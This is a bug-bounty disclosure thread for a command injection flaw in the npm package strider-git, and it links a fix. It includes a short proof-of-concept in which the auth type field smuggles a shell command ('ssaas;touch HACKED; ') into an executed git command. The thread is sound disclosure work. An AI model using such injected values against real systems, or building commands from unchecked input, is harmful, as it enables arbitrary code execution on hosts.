Closed huntr-helper closed 4 years ago
@Mik317 would love to learn more about the issue
Hi @knownasilya :). I reported the issue originally to the NPM team through their HackerOne program, however I opted to disclose it also through the Huntrs platform in order to make sure the issue would have been addressed quickly ;).
Here are the steps to reproduce the issue:
// poc.js
var git = require("strider-git/lib");
git.getBranches({auth:{type:'ssaas;touch HACKED; ', privkey:'sss'}, url:'http://sss'}, '', function(){})
HACKED
npm i strider-git # Install affected module
git init # Initialize as *git* dir
node poc.js # Run the PoC
HACKED
has been created :)Regards, Mik
🛠️ A fix has been provided for this issue. Please reference: https://github.com/418sec/strider-git/pull/1
🔥 This fix has been provided through the https://huntr.dev/ bug bounty platform.
This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)
Overview
strider-git allows strider to use any git repository for a project.
he issue occurs because a
user input
is formatted inside acommand
that will be executed without any check.Bug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/
We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚
Automatically generated by @huntr-helper...